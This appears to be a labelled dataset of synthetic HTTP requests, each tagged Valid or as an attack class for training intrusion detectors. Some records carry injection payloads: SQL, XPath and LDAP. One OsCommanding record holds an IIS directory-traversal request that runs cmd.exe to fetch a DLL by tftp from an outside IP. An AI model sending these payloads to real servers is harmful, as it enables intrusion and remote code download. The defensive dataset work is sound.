TE: gzip,trailers,gzip
Trailer: Transfer-Encoding
User-Agent: t6nlsn/0.7.5
UA-CPU: MIPS
UA-Disp: 035,213,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 4366x138
Via: FTP/8.7 123.242.72.77, 1.0 www.rhafs8.css:05, 2.4 www.cytd.css
Transfer-Encoding: identity
Upgrade: tnvs/0.0, hpfm/8.3, dtti/3.8
Warning: 345 18.66.75.142 "egj3Lsf4olmsnle" 
X-Forwarded-For: 247.63.27.49
X-Serial-Number: 07250017446349545353
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

omr=nmj$iuemg6iisN&o45niaries=mwoDk

End - Id: 4745
Start - Id: 16468
class: Valid
GET /HS/oesuenmahe/passthru4RyPTD4IYFOrwO/ametaXdivRadkIR0/ti5n4or9lhss.gif?wymot3Id8t=525576&RuyZkRy8HGko=80555&9wiazpohiolm=100&ss2Ro1AlF1t=aD4_Q.EqUC5&tosupt7Eedsuq2=tb8ni14rEorEasXan&uyowmoa1m7csa=95102&oelsn8yCp1Cl=nrReservicesttii%24t9ou+pseesystem&bdUt1eedqpe9ln=6&xn-MHF4@98=std&wi6aohUvhjT=66641&iohinrrmh=217701026&dETpNseleeuei=fdon&exectHI.LNe=75658216&iprcsettii=7&exjhfNfadfn=02 HTTP/1.0
Host: www.udoirci.biz
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: x-mac-turkish;q=0.7, big5, big5;q=0.0, us-ascii
Accept-Encoding: gzip, deflate;q=0.4, compress, identity
Accept-Language: dAi-l, lpcU5-t;q=0.9, ttertsm-sesiusns;q=0.8, qtpgienp-etdp3;q=0.4
Cache-Control: min-fresh=45
Client-ip: 35.26.248.242
Cookie: 8a4=dshfekvh;ivUTyl09ehB=44866
Cookie2: $Version="75"
Date: Mon, 08 Nov 04 09:19:11 CET
ETag: W/"7ZIa@ypOpsN0Ej0_f"
Expect: a8ore9x=5uyanh;logp
From: enneeci@ehirrnmall.it
If-Modified-Since: Thu, 11 Jun 09 23:54:50 GMT
If-Unmodified-Since: Mon, 06 Apr 09 12:40:35 UTC
If-Match: *
If-None-Match: "DZvkpY0K-wBSeOmzkPx"
If-Range: "iI6XntsMFyOGQOVkT"
Max-Forwards: 2
MIME-Version: 2.4
Pragma: l=ss
Proxy-Authorization: Digest uri=/IAsecrM/t6wjedTo/tthpnsym/rtgxd6hc.jpeg
Authorization: NTLM ZDBldGFoYzlsdHRpZTlkaXRuc2d3cmVvemVockVxdEdn
Range: 549-074,-27,775460-
Referer: http://pusy.cz/tllnTT/rnut/2eleraei/noteSz.mp3
TE: gzip;q=0.8,trailers,gzip
Trailer: Warning
User-Agent: ejBfXzWX http://www.srs0g.com
UA-CPU: StrongARM
UA-Disp: 097,580,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 714x1442
Via: 3.9 50.232.83.163, 7.2 www.stEnpo.jpg:44, 3.9 www.aimltz2.tiff
Transfer-Encoding: compress
Upgrade: ilaso/8.2, rn4tl/5.3, fup/8.7, rg6eut/5.9, n8ht59/1.9
Warning: 370 www.iyBsefum.jpeg "timSyvOwYswe" "Fri, 05 Mar 10 02:10:32 CET"
X-Forwarded-For: 74.91.46.48
X-Serial-Number: 764868889317962495
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 16468
Start - Id: 12818
class: Valid
GET /ssoseetedmbyniig0.sh? HTTP/1.0
Host: www.fm1iUmAdt.fr:80
Connection: keep-alive
Accept: video/*
Accept-Charset: iso-8859-8-i
Accept-Encoding: *;q=0.8
Accept-Language: *;q=0.2
Cache-Control: no-cache
Client-ip: 93.77.167.25
Cookie: bwtmxlo=t4mKHFf
Cookie2: $Version="827"
Date: Sat, 03 Sep 05 24:17:50 CET
ETag: "k_kEiDRRGUIJqseTb_"
Expect: 100-continue
From: tibfhrt@6ra7.com
If-Modified-Since: Wed, 13 Sep 06 14:43:32 CET
If-Unmodified-Since: Mon, 12 Nov 07 12:25:43 GMT
If-Match: "RdyzgGgRkSzrX9QqVS"
If-None-Match: "kgI_BvI-g2hMQkagV"
If-Range: *
Max-Forwards: 331
MIME-Version: 8.3
Pragma: pMcshzue='0Stb'
Proxy-Authorization: eyohh ttisu=ycytr
Authorization: auscur wfscrzT=3tceno
Range: 21422-48421,794-1314,40253-
Referer: http://www.uiu6b7sp.uk/naoltsg/Y80wena4.nsf
TE: trailers,chunked;q=0.7
Trailer: Referer
User-Agent: Mozilla/9.6 (compatible; ycaAgtocal; Open BSD i586; rhFs5emrEf; nyetwgp7a)
UA-CPU: MIPS
UA-Disp: 3127,7217,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 8634x945
Via: 1.1 www.hJrrm.js, 3.6 151.223.182.210, 8nbto/8.3 www.creon.png
Transfer-Encoding: compress
Upgrade: DoR/2.1, rahogo/2.6
Warning: 494 130.146.46.121 "atTyo" "Sun, 05 Oct 08 10:26:05 GMT"
X-Forwarded-For: 126.193.58.111
X-Serial-Number: 392683968
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12818
Start - Id: 14090
class: Valid
GET /s9ddIosr@b_-joN5.L/otgttFairted/Q2wyyMDuO.o.htm?dT3ehf7orExgd=39&opyg7tu=%3B%3C&oJsts0actzDtd=tUHmr4WyLMP&DF17bodyEJf=It&yopen184s=92&asgqtontiEPoto=%28%3Fhtpassthru&hcberqe=099680&nlzi1ptrc=llinsert+&d5hmoe1bt=%26i0aaslink5%40hSe9sa&eqr=uWr1Es2bUu_&ssct4k1Zprah=99902628 HTTP/1.0
Host: www.ahseire.ch:435
Connection: close
Accept: */*;q=0.5
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: honnSsi-oe;q=0.6
Cache-Control: max-stale=43849
Client-ip: 126.153.206.126
Cookie: ni0=Bfcyu group by0s<YoMD;eelfef=11933
Cookie2: $Version="3"
Date: Sun, 27 Jul 08 02:19:49 GMT
ETag: W/".dr9JQdIiJ3d_oxYF@aP"
Expect: aPny=a7Ek
From: nuea@cnmet.it
If-Modified-Since: Sun, 13 Dec 09 16:34:42 UTC
If-Unmodified-Since: Sun, 19 Apr 09 22:30:57 UTC
If-Match: "U-qM4Az_N8G2BVVF5"
If-None-Match: "caCEN@FJe0zO1IJ3oYB"
If-Range: Thu, 26 Aug 04 07:17:14 UTC
Max-Forwards: 62
MIME-Version: 3.4
Pragma: 9ut6='S'
Proxy-Authorization: NTLM aGR0ZWdvYXV0ZXNpNE1wZWVjbW5kaGVqVHVUYUxlbzA=
Authorization: NTLM dW43ZTNOOXRlZXhzaWZpZXhzbGF1dDl0b0ZBb0dodG45ZnlhYWNlbWxpaUM1
Range: 784942-,615-
Referer: /aiil.exe
TE: trailers
Trailer: If-None-Match
User-Agent: Mozilla/5.1 (Machintosh; U; PPC 5.4; lt-ac; rv:8.3.1) Gecko/34809255
UA-CPU: Sparc
UA-Disp: 091,777,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 5013x5767
Via: FTP/8.8 134.136.233.2
Transfer-Encoding: identity
Upgrade: AwRag/8.7, eiPt/1.4
Warning: 212 92.42.159.177:5 "tacideteon" 
X-Forwarded-For: 123.87.48.214
X-Serial-Number: 7508201
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14090
Start - Id: 19552
class: Valid
GET /iu1wCqsge1KQak5/of2gxhyRDtjanex/tSe7hnsssInHgbif/ppI.tiff?zUuupdateHHde3iframeE4=aqecEoqcenoS+m&sbo4h8ynura=+9cqfomcna HTTP/1.1
Host: 249.244.209.254:80
Connection: close
Accept: application/*;q=0.0
Accept-Charset: iso-8859-4, isiri-3342
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: max-stale
Client-ip: 223.14.227.105
Cookie: x1tcec=766;m8rhb5tcioD7ity=tmp+camis>Streisd
Cookie2: $Version="4"
Date: Sat, 30 Jun 07 11:10:43 GMT
ETag: "pwhBmkWUsY.qmAUm8"
Expect: emeCt
From: ogeen@6fmx.ch
If-Modified-Since: Thu, 20 Sep 07 06:09:31 GMT
If-Unmodified-Since: Sun, 27 Feb 05 06:10:47 CET
If-Match: "B6rD4WnUXs3VZI6C"
If-None-Match: "SCoj_9sYDwa9JMEYxWI"
If-Range: Wed, 14 Jun 06 11:58:55 CET
Max-Forwards: 23
MIME-Version: 8.6
Pragma: no-cache
Proxy-Authorization: Houyig La3tes=eueu9ake
Authorization: NTLM Q3loZ3RobW9yZGk4ZnpzbjlSU2lncGRzb3NhaWVpd210bmxpYTllZg==
Range: 156-,0-
Referer: /irlaegm.png
TE: chunked;q=0.5
Trailer: Date
User-Agent: Mozilla/4.3 (Windows; U; WinNT 1.2; os-7s; rv:7.6.9) Gecko/75454474
UA-CPU: MIPS
UA-Disp: 3027,9526,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 690x0416
Via: 9yo/5.6 123.82.69.158, 4.3 www.8emqt0.htm, 0.3 119.82.131.97:02
Transfer-Encoding: deflate
Upgrade: blY3i/9.6
Warning: 802 110.29.94.224 "lAaytl0aamiAkestm" 
X-Forwarded-For: 194.75.244.233
X-Serial-Number: 519180287127088913
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19552
Start - Id: 42101
class: SqlInjection
GET /nc7/u0JkN/RS5stcop8jaebtpn/sp7sihe6Or/hordy7tn9vstdr56en/zluaa8oQqhOnhirY/rinmeslonOta7L/nsleamnttUuvpaanos/oVraZfQU88nph-gK.htm?v4=smPfL0fAoP7t&tSh9sti=window.openeg4linkeinaeGdir&AcatGtwinnte=%27+OR++++%27tdlmfe%27+++++LIKE+++++%27aze%2525&ncxogsghee=82&ebuw1fewrle=systemn+OissuO&s2rtaeroendwtb=dm6eo89e7ni4gwere&iaunhltA=6&7EHN=90375137&b9dtn3t0=%5C%5Dfl&WalFe=236&AZjQYEAtRBcE=rimc%2Fhavingr%5Dt+d%5Ca8b&solTh1pc1sbe=2612510&ihttnhzgth=t.w&ylmkdeel4=aitsto07ca%24reIci2passwdg HTTP/1.0
Host: www.espIshwdb.net:80
Connection: close
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: identity, identity;q=0.5, deflate
Accept-Language: yaec-ddmmo7a;q=0.3, mlhzmnH-g3tch;q=0.6, ushe-s6brRyOr;q=0.9, ecsBiz-e;q=0.9, csnonmsE-aa8csc
Cache-Control: aneevee='aweeaa'
Client-ip: 195.244.99.47
Cookie: ih=ret d;tbadcbgK=$[i&8tmpNe; 'g3dr8tem;EoECii=imetaaallrtr;d5r=192625131;3xGeon12linawu=27535;5i7uNsinhiho=nAResehnsamftformsaeoc
Cookie2: $Version="787"
Date: Tue, 16 Sep 08 12:56:36 UTC
ETag: W/"D83eFbifPOT4iL7"
Expect: troiSdth=erstetro;ir9otau
From: LzmxnseS@evezd.fr
If-Modified-Since: Thu, 23 Aug 07 12:00:53 CET
If-Unmodified-Since: Fri, 02 Nov 07 22:48:49 CET
If-Match: *
If-None-Match: "AlbU6bliUe-VUnB0EVE"
If-Range: *
Max-Forwards: 3
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: Digest uri=/wSot5/LjitAzt.php3
Authorization: Digest nonce
Range: -824,-58,-460
Referer: http://www.rsrec.net/e5tt8ise/od6q5aes/7kt5e.css
TE: trailers,gzip
Trailer: User-Agent
User-Agent: ghfewirt5lr
UA-CPU: Sparc
UA-Disp: 7402,9004,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 4728x9077
Via: 7.2 21.154.160.191, 1.4 www.su0ortlt.htm:7
Transfer-Encoding: deflate
Upgrade: axh/8.9, sit/8.6, rcc/1.0, ite/1.1
Warning: 145 www.cr5ce.html "1asaNdgii" "Tue, 19 Jan 10 12:01:34 CET"
X-Forwarded-For: 39.4.112.68
X-Serial-Number: 912151407
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42101
Start - Id: 9415
class: Valid
GET /fepd07/sUWgO/QngDE3O_M/oDTBGIu1cks2N0/igctRhdqYidlOaS/e.rkf7mYy88xOycqx1V.exe?liieTctIfQgt=w%2F&jhJZ.XR3alup=4&passwdTLs=0%2F&lseensemr11n3O=psf%25from&emgacnfwe=9&ws6e=6neiaeisnsne&mn=smUz1d&oAprocessing-instructionDmwIqLbody=%27nAos&hats8dxtsnrig=589&wnldey=qrl&snpdf=biEEhinmntatn&lehEhHlsnj=heval+%27e&hoeeak8toenw=nomzmsfket5EdCeiei&0PiCUUI=Betx&eNJea3l9eew7asd=tae%3Cai HTTP/1.1
Host: www.semvjO.gov
Connection: close
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: *;q=0.8
Accept-Language: ofrzeeqE-sany
Cache-Control: no-store
Client-ip: 117.30.4.151
Cookie: npcaorMsta=e0lTFI;update5NZSmPKftpwv=ka;exr8tttapteah=jeeaeso3395cnbhTta
Cookie2: $Version="956"
Date: Fri, 07 Nov 08 17:39:18 UTC
ETag: "pkgaMft-mgVMqE_IrYK"
Expect: 100-continue
From: xx0art8v@nico4.be
If-Modified-Since: Tue, 11 Apr 06 14:55:41 GMT
If-Unmodified-Since: Sun, 22 Feb 04 08:45:20 GMT
If-Match: "Nc7VOQuA@.O-sQ9X"
If-None-Match: "Bvdi_kqL-HmKdhqQM@"
If-Range: "5Jnaa2@puqOElMqUE"
Max-Forwards: 9105
MIME-Version: 3.5
Pragma: i=8odeurS0
Proxy-Authorization: NTLM aDRla2V1NHNzZ3RuZHJOb29QaGFlZ2ZpNFNhb0N0aGFyaGFPZWhsbnV3
Authorization: NTLM ZW84NmkxY2JpaG9kc3JpbjVPaG5nRWxzc2VudGhudWlMcnluaGNlb20xNm9uZXI=
Range: 15-64208,-25827,5343-67434
Referer: /le9za/aydB/sxlrleno/rcen/3ngso.bin
TE: trailers,trailers
Trailer: Accept-Charset
User-Agent: tTtVnn (im0uaZS2; 9lmVsz; h_RBV8LXB)
UA-CPU: 68000
UA-Disp: 849,768,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 064x637
Via: 7.2 www.tarT.jpeg, 2.9 www.Oogu.css
Transfer-Encoding: identity
Upgrade: n1s/5.5, lmwiso/3.8, Tal9/6.5, E6Ia/4.3
Warning: 933 www.tEc03I.jpeg "aeavhwtsre8nhtum" 
X-Forwarded-For: 89.84.41.1
X-Serial-Number: 637220700897
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9415
Start - Id: 43889
class: OsCommanding
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+tftp%20-i%2062.107.47.226%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.1
Host: www.rnotajOeca.be
Connection: keep-alive
Accept: audio/*, video/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 132.194.132.1
Cookie: baibomretuek=YsxxsaEoai;HKq2Yt8=75848432;srIjciMhitluy=i8;aOk4zsjdottae=]r[dhpnl
Cookie2: $Version="1"
Date: Mon, 01 Jan 07 22:17:55 CET
ETag: W/"d-3S9kQ58tYQbNiwAuAI"
Expect: 100-continue
From: 2bgyahe@ty1w.biz
If-Modified-Since: Wed, 26 Sep 07 18:05:40 UTC
If-Unmodified-Since: Mon, 01 Sep 08 18:24:09 GMT
If-Match: *
If-None-Match: "xmMfbKlWK96TC2ZB"
If-Range: "uTrF-@F-QMjTI4-"
Max-Forwards: 3
MIME-Version: 9.2
Pragma: 3n=2iblSoa
Proxy-Authorization: Digest uri=/uiers/ieatYM/iCiR.tiff
Authorization: Basic dGFndGE6dHNhc2k4
Range: 3121-127,822-
Referer: http://www.tbtpoy.biz/lnrmtrt/ehafw/6sbIwsw.dll
TE: chunked;q=0.2,chunked;q=0.2,gzip
Trailer: If-Match
User-Agent: Mozilla/5.8 (Machintosh; U; PPC Mac OS X 1.1; en-mr; rv:0.6.2) Gecko/15117629
UA-CPU: StrongARM
UA-Disp: 8243,837,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 349x5070
Via: HTTP/0.7 221.188.184.70
Transfer-Encoding: np1euh; iwnbdsd7=rBi7ta
Upgrade: oBor/5.4, bstr/6.6
Warning: 453 28.223.229.127 "anutRoc7" 
X-Forwarded-For: 115.236.50.254
X-Serial-Number: 245906346530085
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43889
Start - Id: 48848
class: XPathInjection
GET /an41nCdd4wrif7tto2/ce9/nKqu-MiRX-ymEnqi-RX/sP0O1enrre6aElHnla/x7inYCPg@QJmG6/hnxNnWnQPAxKA-h/enpa3irfxse/cussidrei/tKK2M2ETPNKA.jpeg?tl9nryuLsns4eMa=tIekhgee%27+++++or+++1%3C+++++df%2F3%2Fzht%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D327%5D+or+%27dpor%27++++%3D+++%27 HTTP/1.0
Host: 68.75.126.15
Connection: hpd8roi
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: only-if-cached
Client-ip: 45.241.92.24
Cookie: eneMi=fu;ecKsivso1xyvt=wget8openua2bmmone;htdoirdemHIaaa=aytTfainnsaoc;ae9ttnrwaeuatr=m2fl.sMT;smSt=20434747;uClog2=dmevgujfoecs
Cookie2: $Version="209"
Date: Fri, 09 Dec 05 01:02:54 CET
ETag: W/".PNa1BMBgDXCsul"
Expect: mOul=adnoax
From: w2h3rar@tkko9pi.org
If-Modified-Since: Tue, 15 Nov 05 08:11:53 UTC
If-Unmodified-Since: Sun, 01 Mar 09 08:44:02 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 893
MIME-Version: 7.4
Pragma: atiEiee='eott3i'
Proxy-Authorization: NTLM bmhhZmVkbmFvYTZvYThlNkFveXRvc2llc3VvaWVhbXp0YWxQYWRLYWxvZg==
Authorization: Basic cnNpbG86ZXNPOQ==
Range: 5-03627
Referer: http://www.tcw3to.org/uisHt/g0NOeKic/jtoh7.doc
TE: gzip;q=0.8
Trailer: Trailer
User-Agent: Mozilla/9.5 (Windows; U; Win 9x 0.9; pa-rp; rv:7.1.8) Gecko/00861329
UA-CPU: MIPS
UA-Disp: 184,1119,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 412x876
Via: FTP/0.1 www.osvihae.html:83, 9.8 254.23.182.86
Transfer-Encoding: tEeso8
Upgrade: qdiue/5.0
Warning: 687 108.217.115.97 "lnedeee" 
X-Forwarded-For: 239.247.179.124
X-Serial-Number: 177199337529573688
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48848
Start - Id: 37749
class: LdapInjection
GET /nebott2aSqdstwh.jpg?G6YyZ2lg9=shutdown&nodehtM=1664&qP.daHscriptLI.UM=818&passthruICFfH76=1156&eova=osd%28a+mopenk&Ct0drnGhuemcOn=ldnw%29%28++++%7C%28aeat%3D*%29&miuts=t5tneOiseo2oa2&elLcameh9=356&scu7p2ro=bhtyte%7CBNnodey3oi1li HTTP/1.0
Host: 89.244.233.56
Connection: keep-alive
Accept: image/gif;q=0.6
Accept-Charset: *;q=0.4
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: no-store
Client-ip: 18.137.252.198
Cookie: ica=t9lim roch;5eansaetyt=ekvial;oridbds=ste;iaaicc=pf
Cookie2: $Version="98"
Date: Sat, 12 Apr 08 22:48:23 CET
ETag: W/"6L-X_u4z8Jt7prV8D"
Expect: aeHari=nagcshtt
From: ft5sbsfs@ttt1ze.uk
If-Modified-Since: Sun, 11 Nov 07 21:24:13 UTC
If-Unmodified-Since: Wed, 11 Feb 04 18:23:55 UTC
If-Match: "TT0@dGZrYb7MKmHcoWF"
If-None-Match: "r0XA-A1E5jHQzyGng.d"
If-Range: "gSUKkBYD5J9.RttPpT"
Max-Forwards: 70
MIME-Version: 0.5
Pragma: no-cache
Authorization: NTLM dW1jdWFvZTVpeDN0bml0aUR1dHJ1bmRTaUl0dGxoZW9hcnJzMmd1cHJlbTVzZHA=
Range: 77072-956,71936-1169
Referer: /fD9Cstac/irDdeOa/ifmO/ztHt/1eoic0so.php4
Trailer: Proxy-Authorization
User-Agent: Mozilla/3.2 (compatible; fsfeo; Unix; ydlTnu7d; meretaaRe; ni9e8mv)
UA-CPU: MIPS
UA-Disp: 1247,507,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 842x443
Via: 6.2 76.136.109.186
Transfer-Encoding: compress
Upgrade: esS/4.5, qssn/5.3, wig/2.0
Warning: 397 www.estmthgu.jpeg "iqcdxmusey4i3" 
X-Forwarded-For: 33.253.224.201
X-Serial-Number: 4395839
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37749
Start - Id: 25514
class: Valid
GET /_zsystemMAXbEKC/n9mb2Et@f8uPXkLqq@O/hlinucis2oiafc4hv.gif?nepti=dtc&eaoihr3eO=rWth&fweudFhQgNJ=enneiul&tpilCALlamsi=izYU&ynl=c+&tsnyndtaR=anX2&Wwp-ftp-P=e%7C&ep=bhomeb+%3Bnni%27d%3Dlogfft%3Bth&e5ccfu=56591920&snynelhytmnful=9075537305&sock_stream@.winnt3iiframe=d%3B93ul&l8raocoe1=+ HTTP/1.1
Host: www.esmh.ch
Connection: ezaa
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: identity
Accept-Language: w2utou-i, New-loel, ensij-6eas, gbo-io, o3teee-iyatfn
Cache-Control: only-if-cached
Client-ip: 39.22.35.117
Cookie: ahoYeg6Esersh2=12456;3%uoqaw8=eimgd
Cookie2: $Version="8"
Date: Tue, 16 Oct 07 19:09:46 CET
ETag: W/"2dE0F5cVq.j8E7O5Izr"
Expect: 100-continue
From: hhexy@ieecah.it
If-Modified-Since: Wed, 21 May 08 17:29:31 UTC
If-Unmodified-Since: Sat, 24 Apr 04 09:16:31 GMT
If-Match: *
If-None-Match: "-VgQLaA8v_-UI4lMSq"
If-Range: *
Max-Forwards: 9453
MIME-Version: 1.0
Pragma: 0odtpoo='A7xmjNrd'
Proxy-Authorization: NTLM aWF0YWxzbmVtZ3EwZWl1MG5waXR3YXJkaXBIbm0wc3RuYmJhcnNlYnJjYg==
Authorization: Basic MHJkczp0dDFM
Range: 6-,950-89
Referer: /us3edS/rofh1/tahr5q/ttOv.mdb
TE: gzip
Trailer: Date
User-Agent: Mozilla/3.4 (Machintosh; U; PPC 5.7; is-dt; rv:3.2.5) Gecko/92759145
UA-CPU: x86
UA-Disp: 0020,943,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 5796x493
Via: hc5so/3.3 www.eizgr.htm:6, HTTP/6.3 www.93tele.jpeg
Transfer-Encoding: compress
Upgrade: ftdTss/7.6
Warning: 857 81.72.64.201:0289 "eelt7eziiiiloger" 
X-Forwarded-For: 62.171.11.144
X-Serial-Number: 33645142012185435
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25514
Start - Id: 36975
class: LdapInjection
GET /cL63/s4MG1J/tE/iDTMj9Ma1wG6/S0gY_scriptU9E4boot.inif/mq3mlPLUfOnFXgfVj/dP12Lvlic9.h7S5o@kv/aqZiuO28K_OeBfetUcI/zxSEzqSSRPZwKKvA/oeohs9dees/n60mVM3PAc_Oz/eMr.jpeg?systemBZgT=%3F%3Ca34&4c0cwrmi6ado=en%29%28++++%7C%280e%3D*%29&7kcopy_=dru&pNdw=window.opentexec&0betweent0_tZu3=+loai&PfromjQmQMwiZ2=11592299&phimsueno4nwqhc=%40rpeo&rletmgdtctitnam=hFalingvOd&TctoOuo=n%3Frmppboh&aclfohimEqQs=01100&smrd7NeiatyW8=001&nooonj=65305599&5o3cqeN3renz1=rsn HTTP/1.1
Host: 105.183.158.221:131
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: z-of9deaAl;q=0.7, etb0-zt;q=0.0, sewsg-mStnhne;q=0.8, esr-e;q=0.7
Cache-Control: eejhTh=iFhnyso
Client-ip: 239.152.191.189
Cookie: s5sess1yhoteh=h_7Usfd2
Cookie2: $Version="595"
Date: Sun, 07 Dec 08 23:32:43 CET
ETag: W/"YZcyTj4_d3_1LAB"
Expect: 100-continue
From: fipt@jjMrleib1.biz
If-Modified-Since: Sun, 02 Dec 07 05:19:42 CET
If-Unmodified-Since: Tue, 09 Nov 04 08:50:04 UTC
If-Match: *
If-None-Match: *
If-Range: "tIEpV54KJtfgbVYqooZ"
Max-Forwards: 82
MIME-Version: 3.4
Pragma: ger6ay='4e'
Proxy-Authorization: Basic aGlsTmUwOmxzdG9zZmU=
Authorization: nertct ihrdp=xtodlihe
Range: 84-,-422477,1197-5319
Referer: http://www.soseenaH.biz/pkRwe/nieit/nhso.htm
TE: gzip
Trailer: Max-Forwards
User-Agent: eaenTnresh (ie1dsF8a; mvzJPQIxpb; hi7ZMOR; zvYTjqJxW)
UA-CPU: StrongARM
UA-Disp: 2036,1499,8
UA-Color: color8
UA-Pixels: 654x7541
Via: FTP/0.7 193.235.139.46
Transfer-Encoding: eel4bi; eesNp=0tGeir
Upgrade: eslm/4.5, njAt/8.0
Warning: 330 236.251.100.102 "4xln" "Thu, 31 Mar 05 03:35:22 UTC"
X-Serial-Number: 4593021783716355
----: -----------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 36975
Start - Id: 24049
class: Valid
GET /gOVlpMGV3dRzDU/l9oN9a92cRlxt.png? HTTP/1.0
Host: www.eeat.net:2
Connection: keep-alive
Accept: */*
Accept-Charset: ks_c_5601-1987;q=0.3, windows-1250, euc-tw;q=0.8
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.6
Cache-Control: min-fresh=17
Client-ip: 88.212.87.151
Cookie: -np%upasswdSUWoA8bin=idnpss;tae=54958
Cookie2: $Version="342"
Date: Mon, 17 Jan 05 14:48:56 GMT
ETag: "k5I2Oz1HtSkVPYxvG-5T"
Expect: era0lhbh
From: fewUg9v0@yntowDa.org
If-Modified-Since: Sun, 30 Mar 08 22:31:10 CET
If-Unmodified-Since: Fri, 14 Jan 05 06:14:06 UTC
If-Match: ".Cku32E6bt8wT7uULKC"
If-None-Match: *
If-Range: *
Max-Forwards: 4596
MIME-Version: 6.0
Pragma: no-cache
Proxy-Authorization: 5pue neoh0ai=ade4maHi
Authorization: NTLM ZTRwOGFwZXV1ZWRnZXdhYXZvdzJpc1VnNmc4RXRldHQ=
Range: 537-243504,313-,96328-45
Referer: /kxapei6R/tomMsyww/mjtta/wsidgsDn.tiff
TE: trailers,deflate;q=0.1,trailers
Trailer: Range
User-Agent: Mozilla/0.2 (compatible; MSIE 7.9; Windows NT; eg3o; 0ie5adehr; eeefetoe6o)
UA-CPU: x86
UA-Disp: 176,3441,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 775x0014
Via: nsmA/7.8 www.vnouas.css, HTTP/7.9 www.eYyta.jpeg, pct3/7.6 www.3itft.shtml
Transfer-Encoding: deflate
Upgrade: cUYte/7.0, Lbem/8.5, drnfie/8.0, np54/2.3, taoeT/3.0
Warning: 652 250.250.27.45 "ucdaI7dsmtc" 
X-Forwarded-For: 240.187.200.43
X-Serial-Number: 4272941
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24049
Start - Id: 43017
class: OsCommanding
PUT /hqndithare0o/EhLEyqlinkRbAFF/sf/iQdjuPp_mFYq-z/ckeahlonouTy.php4? HTTP/1.1
Content-Length: 195
Content-Language: i,agdel,zmf
Content-Encoding: compress
Content-Location: /m8oDogt/heeoode/isliLng/ilieieme.cgi
Content-MD5: aTB1ZW1UcmllMG95bjZOZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 07 Sep 09 20:22:48 GMT
Last-Modified: Thu, 06 May 04 03:23:47 CET
Host: www.uhMoagdCoy.org
Connection: gknc
Accept: image/gif;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: no-transform
Client-ip: 87.239.190.162
Cookie: becR=tv1ipseTO93ikueen;htccutys4=-forme m;wei8btv=t_BB9DfsE;tmpklhpLZ25@tmpD= ;dhdlle8hbuess=I;ewaixAeovuotm=oitae7es 4jz
Cookie2: $Version="28"
Date: Mon, 31 Aug 09 06:30:39 CET
ETag: "v0-1@Rv2TACZbOUJTaV"
Expect: hnujl5=enoyt;3ssa
From: odyrata@nanebCh8fa.gov
If-Modified-Since: Wed, 01 Jun 05 12:23:03 CET
If-Unmodified-Since: Fri, 17 Jun 05 07:58:37 GMT
If-Match: *
If-None-Match: "u2dVfz8tclrlcaw"
If-Range: "yc@8RMumpyWT.AKlhK"
Max-Forwards: 6
Pragma: no-cache
Proxy-Authorization: Basic c3Nya3BzZWk6VGlhaUdp
Authorization: Digest realm
Range: 171-10,013-0,-6
Referer: http://rq4Oesax.cz/etnPpsjH/ndak.msf
TE: chunked;q=0.9,trailers
Trailer: Pragma
User-Agent: 9iohrlodgds8r
UA-Color: color8
UA-Pixels: 2695x320
Via: FTP/4.4 www.amPgema6.jpg, 5.0 www.1serloi.htm
Transfer-Encoding: compress
Upgrade: oyhgd/4.8, nny/4.3, q6hld/1.0, iLos/5.2
